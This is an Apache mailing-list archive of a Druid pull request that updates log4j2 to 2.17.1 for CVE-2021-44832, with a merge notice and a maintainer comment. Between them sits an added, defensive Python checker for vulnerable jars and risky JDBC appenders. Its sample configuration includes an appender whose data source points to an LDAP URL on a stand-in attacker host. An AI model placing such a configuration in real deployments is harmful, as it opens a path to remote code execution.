Posted to commits@druid.apache.org by GitBox <gi...@apache.org> on 2021/12/30 01:00:06 UTC

[GitHub] [druid] FrankChen021 opened a new pull request #12106: update log4j2 to 2.17.1

FrankChen021 opened a new pull request #12106:
URL: https://github.com/apache/druid/pull/12106


   Fixes the latest vulnerability (44832), which also affects its prior release 2.17.0 that is being used by Druid on the master branch.
   
   This vulnerability allows RCE for attackers by constructing malicious code for the log4j JDBC appender. Druid's default configuration does not use this kind of appender, so it is not affected.
   
   ### Description
   
   https://logging.apache.org/log4j/2.x/security.html#CVE-2021-44832
   
   ![image](https://user-images.githubusercontent.com/6525742/147713189-bf7a2352-bbb4-45ef-b7a0-dba20bce4531.png)
   
   
   This PR has:
   - [X] been self-reviewed.
      - [ ] using the [concurrency checklist](https://github.com/apache/druid/blob/master/dev/code-review/concurrency.md) (Remove this item if the PR doesn't have any relation to concurrency.)
   - [ ] added documentation for new or modified features or behaviors.
   - [ ] added Javadocs for most classes and all non-trivial methods. Linked related entities via Javadoc links.
   - [ ] added or updated version, license, or notice information in [licenses.yaml](https://github.com/apache/druid/blob/master/dev/license.md)
   - [ ] added comments explaining the "why" and the intent of the code wherever would not be obvious for an unfamiliar reader.
   - [ ] added unit tests or modified existing tests to cover new code paths, ensuring the threshold for [code coverage](https://github.com/apache/druid/blob/master/dev/code-review/code-coverage.md) is met.
   - [ ] added integration tests.
   - [ ] been tested in a test Druid cluster.
   


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: commits-unsubscribe@druid.apache.org

For queries about this service, please contact Infrastructure at:
users@infra.apache.org



---------------------------------------------------------------------
To unsubscribe, e-mail: commits-unsubscribe@druid.apache.org
For additional commands, e-mail: commits-help@druid.apache.org
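The PR text makes two claims an operator would want to verify on their own deployment: that the log4j-core jar on the classpath is below the fixed release, and that no JDBC appender in log4j2.xml points its DataSource at an attacker-reachable JNDI name. The script below is an added example, not Druid or Log4j project code. The affected ranges and fixed releases (2.3.2, 2.12.4, 2.17.1) are the ones listed on the Log4j security page linked in the PR; the sample configuration and jar names are constructed for the example, and the "java:" prefix test reflects the 2.17.1 fix, which limits JDBC appender JNDI names to the java protocol.

```python
"""Checks for exposure to CVE-2021-44832 (Log4j 2.x JDBC appender with a JNDI data source).

Added example, not Druid or Log4j code. Two checks:
  1. version_is_affected / affected_jars: is log4j-core below the fixed release for its line?
  2. risky_jdbc_datasources: does a log4j2.xml declare a JDBC appender whose DataSource
     jndiName uses a non-"java:" protocol (e.g. ldap://)? That is the configuration
     shape the CVE requires; 2.17.1 rejects such names outright.
"""
import re
import xml.etree.ElementTree as ET

# Fixed releases named on the Log4j security page for this CVE.
FIXED_2_3_LINE = (2, 3, 2)      # Java 6 line
FIXED_2_12_LINE = (2, 12, 4)    # Java 7 line
FIXED_2_17_LINE = (2, 17, 1)    # main line (Druid moves 2.17.0 -> 2.17.1 in this PR)

# Matches e.g. log4j-core-2.17.0.jar or log4j-core-2.0-beta7.jar; pre-release
# qualifiers are ignored, which only errs on the side of flagging.
JAR_RE = re.compile(r"log4j-core-(\d+)\.(\d+)(?:\.(\d+))?(?:-[\w.]+)?\.jar$")


def core_version(jar_path):
    """Return (major, minor, patch) from a log4j-core jar file name, or None."""
    m = JAR_RE.search(jar_path)
    if not m:
        return None
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def version_is_affected(version):
    """True if a log4j-core version falls inside the CVE-2021-44832 affected range."""
    major, minor, _ = version
    if major != 2:
        return False                      # log4j 1.x is out of scope for this CVE
    if minor <= 3:
        return version < FIXED_2_3_LINE
    if minor <= 12:
        return version < FIXED_2_12_LINE
    return version < FIXED_2_17_LINE


def affected_jars(jar_paths):
    """Filter jar paths down to log4j-core jars in the affected range."""
    return [p for p in jar_paths if (v := core_version(p)) and version_is_affected(v)]


def risky_jdbc_datasources(log4j2_xml):
    """Return (appender name, jndiName) for every JDBC appender DataSource whose
    JNDI name does not use the "java:" protocol. Handles both the plugin-name form
    (<JDBC>) and the strict form (<Appender type="JDBC">)."""
    root = ET.fromstring(log4j2_xml)
    findings = []
    for node in root.iter():
        tag = node.tag.lower()
        is_jdbc = tag == "jdbc" or (tag == "appender" and node.get("type", "").lower() == "jdbc")
        if not is_jdbc:
            continue
        for child in node:
            if child.tag.lower() == "datasource":
                jndi_name = child.get("jndiName", "")
                if not jndi_name.lower().startswith("java:"):
                    findings.append((node.get("name"), jndi_name))
    return findings


# Constructed sample configuration: one benign JDBC appender, one with an LDAP data source.
SAMPLE_CONFIG = """<Configuration status="warn">
  <Appenders>
    <Console name="stdout" target="SYSTEM_OUT">
      <PatternLayout pattern="%d %p %c - %m%n"/>
    </Console>
    <JDBC name="auditDb" tableName="audit_log">
      <DataSource jndiName="java:comp/env/jdbc/AuditDS"/>
      <Column name="message" pattern="%m"/>
    </JDBC>
    <JDBC name="evilDb" tableName="logs">
      <DataSource jndiName="ldap://attacker.example.test:1389/ds"/>
      <Column name="message" pattern="%m"/>
    </JDBC>
  </Appenders>
  <Loggers>
    <Root level="info"><AppenderRef ref="stdout"/></Root>
  </Loggers>
</Configuration>
"""

# Constructed sample classpath listing.
SAMPLE_JARS = ["lib/log4j-api-2.17.0.jar", "lib/log4j-core-2.17.0.jar", "lib/log4j-core-2.17.1.jar"]

if __name__ == "__main__":
    print("affected jars:", affected_jars(SAMPLE_JARS))
    print("risky JDBC data sources:", risky_jdbc_datasources(SAMPLE_CONFIG))
```

Run it against `find /opt/druid -name 'log4j-core-*.jar'` output and each log4j2.xml shipped in Druid's conf directories; an empty result from both functions corresponds to the "not affected" statement in the PR, while a non-empty jar list alone means the version still needs the bump even if no JDBC appender is configured today.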


[GitHub] [druid] gianm merged pull request #12106: update log4j2 to 2.17.1

Posted by GitBox <gi...@apache.org>.
gianm merged pull request #12106:
URL: https://github.com/apache/druid/pull/12106


   




[GitHub] [druid] FrankChen021 commented on pull request #12106: update log4j2 to 2.17.1

Posted by GitBox <gi...@apache.org>.
FrankChen021 commented on pull request #12106:
URL: https://github.com/apache/druid/pull/12106#issuecomment-1002830895


   This is the 4th update since the first CVE was announced earlier this month. To be honest, I'm tired of such things. Hope there won't be any vulnerability in log4j in the upcoming new year, which will give all of us some relief.

